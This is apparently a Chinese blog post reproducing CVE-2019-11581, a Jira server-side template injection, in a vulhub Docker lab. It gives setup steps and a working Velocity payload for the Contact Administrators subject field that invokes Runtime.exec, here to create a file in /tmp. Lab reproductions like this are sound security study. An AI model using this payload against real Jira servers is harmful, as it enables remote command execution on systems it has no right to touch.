Atlassian Jira 模板注入漏洞(CVE-2019-11581)

最新推荐文章于 2024-08-07 23:11:43 发布
最新推荐文章于 2024-08-07 23:11:43 发布
阅读量861 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: jira 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110721983
版权

声明

好好学习,天天向上

漏洞描述

Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令:

影响范围

4.4.x
5.x.x
6.x.x
7.0.x
7.1.x
7.2.x
7.3.x
7.4.x
7.5.x
7.6.x before 7.6.14 (the fixed version for 7.6.x)
7.7.x
7.8.x
7.9.x
7.10.x
7.11.x
7.12.x
7.13.x before 7.13.5 (the fixed version for 7.13.x)
8.0.x before 8.0.3 (the fixed version for 8.0.x)
8.1.x before 8.1.2 (the fixed version for 8.1.x)
8.2.x before 8.2.3 (the fixed version for 8.2.x)

复现过程

这里使用8.1.0版本

使用vulhub

cd /app/vulhub-master/jira/CVE-2019-11581

使用docker启动

docker-compose up -d

搭建过程跟confluence类似,都要申请key,很繁琐

环境启动后,访问http://your-ip:8080会进入安装引导,切换“中文”,VPS条件下选择“将其设置为我”(第一项)去Atlassian官方申请一个Jira Server的测试证书(不要选择Data Center和Addons):

然后继续安装即可。这一步小内存VPS可能安装失败或时间较长(强烈建议必须使用4G内存以上的机器进行安装与测试,否则报错报的你怀疑人生),请耐心等待,安装过程中记住你输入的用户名和密码,一会需要登录使用,让你输入邮箱,比如1@2…那么1就是你的用户名。

http://192.168.239.129:8080

安装完成,docker服务器8G内存果然不是盖的

在这里插入图片描述

登录成功后访问,添加

http://192.168.239.129:8080/secure/admin/AddSmtpMailServer!default.jspa

在这里插入图片描述

访问,进行系统设置

http://192.168.239.129:8080/secure/admin/EditApplicationProperties!default.jspa

在这里插入图片描述

左上角创建按钮,随便创建一个项目

创建成功后,访问

http://192.168.239.129:8080/secure/ContactAdministrators!default.jspa

漏洞爆发点在主题字段,把主题换上我们的payload,点击发送

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('touch /tmp/cve-2020-11581').toString()

在这里插入图片描述

点发送后,实际上命令就已经执行了,如果发现还没执行,可以先去线面看看是不是卡队列了,如果队列里都空了,那十有八九都执行了

http://192.168.239.129:8080/secure/admin/MailQueueAdmin!default.jspa?page=

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
专栏目录
Atlassian Jira 模板注入漏洞CVE-2019-11581)复现
玄道的网安博客
12-13 1567
漏洞描述 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 多个版本前存在利用模板注入执行任意命令: 影响范围 4.4.x 5.x.x 6.x.x 7.0.x 7.1.x 7.2.x 7.3.x 7.4.x 7.5.x 7.6.x before 7.6.14 (the fixed version for 7.6.x) 7.7.x 7.8.x 7.9.x 7.10.x 7.11...
CVE-2019-11581漏洞复现
yeshankuangrenaaaaa的博客
07-23 1874
CVE-2019-11581漏洞复现 Author:IronDate:2020-07-20 文章目录CVE-2019-11581漏洞复现@[toc]参考链接漏洞描述产品描述漏洞描述漏洞影响版本靶机环境搭建环境版本安装Jira配置Jira漏洞复现发起攻击攻击效果前后对比 参考链接 下载地址 安装教程 漏洞信息 漏洞描述 产品描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 漏洞描述 攻击者可以利用此漏洞对运行受影响
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581
qq_44504968的博客
04-06 1179
Atlassian JIRA服务器模板注入漏洞CVE-2019-11581)一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现六、漏洞修复方案 一、漏洞原理 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 因atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/Contact
认识漏洞-Jira身份验证绕过漏洞、GIT泄露漏洞
Boom!脑洞大爆炸的博客
07-27 274
认识漏洞-Jira身份验证绕过漏洞、GIT泄露漏洞
测试两个主机之间的连通性_利用Jira的邮件服务器连通测试功能发现其CSRF漏洞...
weixin_39933508的博客
11-21 183
去年10月,Tenable研究员发现Jira v8.4.1版本存在一个跨站请求伪造漏洞(CSRF)-CVE-2019-20099,籍此可以让目标Jira服务去连接任意内部主机,Atlassian Jira受该漏洞影响的版本范围为8.7.0到8.2.4之间的Jira Server 和 Data Center。以下即是具体发现CVE-2019-20099漏洞的过程。Jira部署的防CSRF策...
cve-2019-11581 Atlassian Jira未授权服务端模板注入漏洞
whatday的专栏
12-21 1989
漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 Atlassian Jira Server和Jira Data Center存在服务端模板注入漏洞,成功利用此漏洞的攻击者可在运行受影响版本的Jira Server或Jira Data Center系统上执行任意命令。 目前PoC已放出,建议受影响的客户尽快升级或采用临时缓解措施。 第一种情况,Jira服务端已配置好SMTP服务器,且“联系管理员表单”
CVE-2019-8449 Jira 枚举用户漏洞的利用
Big World
02-13 741
一个很攻击门槛很低的漏洞。可结合其它漏洞配合来进行攻击。 首先来简单说一下这个漏洞,该漏洞就是在Jira 8.4.0以前的版本,攻击者可以在不经过授权的情况下访问/rest/api/latest/groupuserpicker这个路径来枚举用户。漏洞危害评级中危。 2020年2月3日在exploit-db上公布了该漏...
Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396
最新发布
山兔的博客
08-07 479
2.影响版本:6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。访问服务器ip地址,如:192.168.109.130:8090 进行安装,安装步骤如下:选择Trial Installation——》Next。直接使用邮箱账号,点击New Trial License——》select product——》Confluence。然后会让你填写用户名,如果提示填写路径,路径填写。我这边建立失败了,就不复现了。
CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF漏洞分析
小王的储物间
01-31 413
其中batchService接口的实现类BatchServiceImpl位于com.atlassian.jira.plugin.mobile.service.impl.BatchServiceImpl.class。插件,在com.atlassian.jira.plugin.mobile.rest.v1_0.BatchResource中存在barch。继续跟进,位于com.atlassian.jira.plugin.mobile.util.LinkBuilder.class。
Jira 8.3.4 信息披露漏洞CVE-2019-8449)
Darklord.W
11-19 1018
Jira 8.3.4 信息披露漏洞CVE-2019-8449) 漏洞描述: ​ Atlassian Jira 8.4.0之前版本/rest/api/latest/groupuserpicker接口允许未授权查询员工信息,攻击者可以通过爆破用户名名单等方法获取用户信息 影响版本: 7.12< 受影响版本<8.4.0 漏洞复现: 下载并安装jira 8.4.0之前的版本(PS:jira安装需要java环境) 直接构造payload /rest/api/latest/groupuserpick
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述 版本8.4.0之前的Jira中的/ rest / api / latest / groupuserpicker资源允许远程攻击者通过信息泄露漏洞枚举用户名。 用法 python CVE-2019-8449.py 链接
最近的Jira漏洞
公众号shadow sock7
07-16 895
https://jira.atlassian.com/browse/JRASERVER-71113 https://jira.atlassian.com/browse/JRASERVER-71114 https://jira.atlassian.com/browse/JRASERVER-70923 https://jira.atlassian.com/browse/JRASERVER-71107 https://confluence.atlassian.com/jirasoftwareserver/atta
Jira未授权SSRF漏洞(CVE-2019-8451)
Li-D的博客
12-31 1543
漏洞描述 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。 漏洞危害 远程攻击者可以利用此漏洞Jira服务端的身份访问内网资源。 漏洞影响版本 Jira < 8.4.0 漏洞分析 两个关键信息点: • 漏洞点在/plugins/servlet/gadgets/makeRequest • 原因在
Jira Service Management Server和Data Center身份认证绕过漏洞CVE-2023-22501
鸭梨山大。
02-08 556
Jira Service Management(JSMs)Server和Jira Service Management(JSMs)Data Center基于Jira平台,是Atlassian提供的IT服务管理解决方案的两种版本。当Jira Service Management实例启用对用户目录和传出电子邮件的写访问权限时,攻击者可获取未登录过的注册账户令牌,从而导致攻击者在某些情况下冒充另一个用户,并获得对Jira Service Management实例的访问权限。对此,目前厂商已发布安全版本。
Apache Subversion Use-After-Free漏洞CVE-2022-24070)
murphysec的博客
04-19 600
CVE-2022-24070漏洞会造成Apache Subversion下处理请求的 HTTPD 工作进程崩溃,进而导致拒绝服务,目前该漏洞已修复,建议受影响用户更新到安全版本,或下载官方补丁:https://subversion.apache.org/security/CVE-2022-24070-advisory.txt 编号       CVE-2022-24070                      标题 Apache Subversion Use-After-Free漏洞
Atlassian Jira 信息泄露漏洞(CVE-2019-3403) 排查思路
HeLLo_a119的博客
04-28 741
企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。如果是正常的访问也会返回敏感数据,返回包中的敏感信息是正常的响应内容,所以他不算是一次攻击成功,算是误报。告警的检测规则是匹配响应中有没有返回数据包里面带有敏感信息的部分(检测URL和响应体)。如果是内部人员正常的操作,可以确定这是一次误报,但是不能确定他存不存在这个漏洞。2.通过受害者IP地址找到对应的人员并确认他们是否进行了可能的不当操作。信息泄露漏洞的告警。
漏洞笔记--Jira 相关漏洞复现及利用
NoooEmotion的博客
01-28 4597
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
JIRA:创建问题指南-汽车操纵动力学视角
JIRA是由Atlassian公司开发的,适用于缺陷、任务、改进和新功能等多种问题类型的管理工具,特别适合软件开发团队的协作。 首先,JIRA的角色划分清晰,包括管理人员、项目管理者、开发人员、测试人员等。管理人员...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值